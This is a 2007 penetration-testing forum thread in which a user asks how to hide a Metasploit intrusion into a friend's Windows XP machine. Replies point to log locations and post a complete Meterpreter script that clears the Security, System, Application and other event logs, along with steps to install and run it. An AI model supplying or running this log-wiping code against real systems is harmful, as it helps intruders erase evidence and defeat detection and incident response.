.

Beginning Pen Tester

<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sun Dec 23, 2007 4:30 pm

Beginning Pen Tester

Sup Everyone?
Had a basic question or so was wondering if anyone could aim me in the right direction.
A buddy of mine and I have developed a small scheme to see which of us can access each other's computers first without any type of alarm triggering. I can bypass into his with his permission using an exploit in the Metasploit Framework however I'd like to be abit more stealthier. I dont have any custom scripts, but I was wondering, which files in a Windows Xp Machine should be deleted or cleared(Meaning Log Wise, Provide a path for me if you can) so when  he looks through his logs, he wouldnt be able to tell I was Any advice would help guys thanks, and Happy Holidays.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

boney

User avatar

Jr. Member
Jr. Member

Posts: 61

Joined: Mon Jan 15, 2007 8:46 am

Location: India

Post Mon Dec 24, 2007 11:54 am

Re: Beginning Pen Tester

Hi KrisTeason,
Well i dnt have enough expertise on Metasploit, but regarding the logs, i guess it comes under the DataStore system called as LogLevel. You bhave to manually enable ths feature. The log files are stored in the directory of the user’s configuration directory ( /.msf3/logs).
Hope that helps.

happy holidays  :)
C|EH

All my life I wanted a computer...
Now I want my life back !
<<

Kev

Sr. Member
Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Mon Dec 24, 2007 3:50 pm

Re: Beginning Pen Tester

If you are just talking about XP, then its rather simple. On your own machine check out the  Event Viewer by going to the control panel and then computer management. This will show you the normal default logging. Also check C:\WINDOWS\pfirewall.log for firewall logs, but this needs to have been activated by the user as do some of the other logging events in XP. The firewall log is activated under the advance tab once you click the firewall icon in the control panel.
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Mon Dec 24, 2007 5:03 pm

Re: Beginning Pen Tester

Thanks for both your guys' responses. Thanks also to kev for providing that path to the firewall log. I was also wondering if there are anymore logs that could be cleare/deleted using the meterpreter, I'm trying to make sure my homie doesn't catch me here.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Mon Dec 24, 2007 10:28 pm

Re: Beginning Pen Tester

here's a meterpreter script to take care of it for you.

# clears ALL the event logs  - chris [] learnsecurityonline [] com
#
# Event 517 is logged whenever the Security log is cleared, REGARDLESS of
# the status of the Audit System Events audit policy.


print_line("Clearing the Security Event Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

print_line("Clearing the System Event Log\n")
log = client.sys.eventlog.open('system')
log.clear

print_line("Clearing the Application Event Log\n")
log = client.sys.eventlog.open('application')
log.clear

print_line("Clearing the Directory Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('directory service')
log.clear

print_line("Clearing the DNS Server Event Log (If It Exists)\n")
log = client.sys.eventlog.open('dns server')
log.clear

print_line("Clearing the File Replication Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('file replication service')
log.clear

print_line("Done... Have a lovely day :-)")
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Mon Dec 24, 2007 10:38 pm

Re: Beginning Pen Tester

Thanks Gates, All I Need To Do Is Learn How To Put This Script Into The MSF, it'd be useful for someone to aim me that way, if it's not too much trouble :D
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Tue Dec 25, 2007 8:54 am

Re: Beginning Pen Tester

well since its christmas...

http://www.ethicalhacker.net/content/view/136/24/

the script goes into your scripts/meterpreter directroy.

so for me its:

cg@segfault:~/evil/msf3/scripts/meterpreter$ pwd

/home/cg/evil/msf3/scripts/meterpreter

once you get it in your scripts/meterpreter/ directory you can invoke the script by running it within your meterpreter shell.

meterpreter> run clearalllog


there are some videos on EH.net an LearnSecurityOnline.com if you need some more help

-Chris
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Dec 25, 2007 3:13 pm

Re: Beginning Pen Tester

Thanks man,
You all have a good christmas.  ;D
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

vital

User avatar

Newbie
Newbie

Posts: 4

Joined: Sun Dec 30, 2007 4:35 am

Post Tue Jan 01, 2008 3:36 am

Re: Beginning Pen Tester

Hello guyz,

How can i know my password if i forgot like in: yahoo account - all the details on my account was i forgotten,  how can i retrieve it again, then the next is how can i retrieved again my password on my laptop windows XP and vista, administrator.

tnx guyz

L30
<<

proudindian

Newbie
Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Tue Jan 01, 2008 4:06 am

Re: Beginning Pen Tester

actually i dont think by metaexploit widout permission u cant break in2 his system.....????am i rite??
<<

LSOChris

Post Tue Jan 01, 2008 8:11 am

Re: Beginning Pen Tester

vital wrote:Hello guyz,

How can i know my password if i forgot like in: yahoo account - all the details on my account was i forgotten,  how can i retrieve it again, then the next is how can i retrieved again my password on my laptop windows XP and vista, administrator.

tnx guyz

L30


i think you need to return that laptop to its rightful owner
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Tue Jan 01, 2008 2:35 pm

Re: Beginning Pen Tester

... and don't hijack a legitimate thread.

Don
CISSP, MCSE, CSTA, Security+ SME

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software